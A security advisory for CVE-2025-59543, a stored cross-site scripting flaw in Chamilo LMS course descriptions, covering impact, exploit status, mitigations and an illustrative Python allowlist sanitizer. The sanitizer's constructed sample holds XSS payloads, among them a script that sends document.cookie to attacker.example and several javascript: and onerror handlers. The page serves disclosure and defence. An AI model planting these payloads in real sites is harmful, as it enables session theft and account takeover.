Platform
php
Component
chamilo-lms
Fixed in
1.11.34 (later releases, including 1.11.35, also contain the fix)
CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability in Chamilo Learning Management System (LMS) versions prior to 1.11.34. A user who can edit a course description can store JavaScript in that field; the script runs in the browser of anyone who later views the course information page, which can lead to account takeover. The issue was fixed in version 1.11.34, and users are strongly advised to upgrade.
The impact of CVE-2025-59543 is significant because of the account-takeover path. An attacker with a low-privileged account, such as a trainer, injects JavaScript into the course description field. When other users, including administrators, open the course information page, the payload executes in their browser context and can exfiltrate session cookies or tokens, or perform actions as the victim, effectively handing the attacker the administrator's account. From there the attacker can read sensitive data, alter course content, or fully compromise the LMS installation. Because the payload is stored rather than reflected, it persists and fires on every view; the victim does not have to click a crafted link.
CVE-2025-59543 was publicly disclosed on 2026-03-06. There is no indication of active exploitation at this time, and no public proof-of-concept (PoC) has been released; stored XSS payloads are, however, simple to construct once the injection point is known, so the absence of a PoC should not be read as low risk. The vulnerability is not listed in the CISA KEV catalog.
Exploit Status
EPSS
0.04% (13th percentile)
CISA SSVC
Not provided
CVSS Vector
Not provided
The primary mitigation for CVE-2025-59543 is to upgrade Chamilo LMS to version 1.11.34 or later. If an immediate upgrade is not possible, apply temporary workarounds while planning the update. Course descriptions are rich text, so plain output escaping would break legitimate formatting; the appropriate server-side control is an allowlist HTML sanitizer that keeps a small set of benign tags and attributes and strips script elements, event-handler attributes, and javascript: or data: URLs. A web application firewall (WAF) tuned for XSS payloads adds a layer of protection but is bypassable and should not be the only control. Setting session cookies HttpOnly and SameSite blunts cookie theft (though an injected script can still act inside the victim's session), and a Content Security Policy that disallows inline scripts limits what a stored payload can do. Review existing course descriptions for injected scripts, since upgrading does not clean up content that was stored before the fix, and restrict roles that can edit course descriptions to the people who need to.
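The allowlist sanitizer described above, and the review of already-stored content mentioned in the impact section, can be illustrated together. The following is an added example written for this page; it is not Chamilo code and does not reproduce the project's actual fix (Chamilo is written in PHP). It uses only the Python standard library, and the sample course description is constructed for the demonstration. The tag and attribute allowlists are assumptions chosen to suit a course description field; a real deployment would tune them to the editor in use.

```python
"""Allowlist HTML sanitizer for a rich-text field such as an LMS course description.

Illustrative code added for this page, not Chamilo's own implementation.
Principle: keep a small set of benign tags/attributes, drop script and style
elements with their content, drop on* event handlers and unsafe URL schemes,
and record every removal so existing content can be reviewed for injection.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlists for a course description field (not Chamilo's settings).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li", "a", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_URL_SCHEMES = {"http", "https", "mailto", ""}  # "" allows relative URLs
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}


class DescriptionSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized HTML fragments
        self.findings = []   # human-readable record of what was removed
        self.skip_depth = 0  # > 0 while inside a <script>/<style> whose content is dropped

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.findings.append(f"dropped <{tag}> element and its content")
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"dropped <{tag}> tag")
            return
        kept = []
        for name, value in attrs:  # HTMLParser lowercases tag and attribute names
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"dropped event handler {name}= on <{tag}>")
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"dropped attribute {name}= on <{tag}>")
                continue
            if name == "href":
                # urlsplit lowercases the scheme and strips embedded tab/newline,
                # so "JaVaScRiPt:" and "java\tscript:" are both caught here.
                scheme = urlsplit(value.strip()).scheme
                if scheme not in SAFE_URL_SCHEMES:
                    self.findings.append(f"dropped href with scheme {scheme!r} on <{tag}>")
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Text nodes are re-escaped so stray '<' or '&' cannot form new markup.
            self.out.append(escape(data, quote=False))


def sanitize_description(html_in):
    """Return (clean_html, findings) for one course description."""
    parser = DescriptionSanitizer()
    parser.feed(html_in)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed sample: a benign description with a stored-XSS payload appended,
# of the kind a low-privileged trainer account might save.
SAMPLE_DESCRIPTION = (
    "<p>Welcome to <b>Network Security 101</b>.</p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(document.cookie)" onclick="steal()">Syllabus</a>'
    '<a href="https://example.org/syllabus.pdf">Syllabus (PDF)</a>'
    '<img src=x onerror="alert(1)">'
)

if __name__ == "__main__":
    clean, findings = sanitize_description(SAMPLE_DESCRIPTION)
    print(clean)
    for f in findings:
        print("REVIEW:", f)
```

Run against every stored description (the findings list is what an administrator reviews), and apply the same function on save so new content is cleaned before it is persisted. A conservative behaviour to note: an unclosed `<script>` drops everything after it, which is preferable to letting the rest of the payload through.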
Update Chamilo LMS to version 1.11.34 or higher. This version fixes the stored XSS vulnerability in the course description, preventing potential account takeover.
CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS versions prior to 1.11.34 that lets a user who can edit course descriptions inject JavaScript executed in other users' browsers, including administrators'.
You are affected if you are running any Chamilo LMS version earlier than 1.11.34. Upgrade to 1.11.34 or later to resolve the vulnerability.
Upgrade Chamilo LMS to version 1.11.34. Consider input validation and WAF rules as temporary mitigations.
There is no current evidence of active exploitation, but the account-takeover impact warrants prompt action.
Refer to the official Chamilo security advisory for detailed information and updates: [https://www.chamilo.org/en/security-advisories](https://www.chamilo.org/en/security-advisories)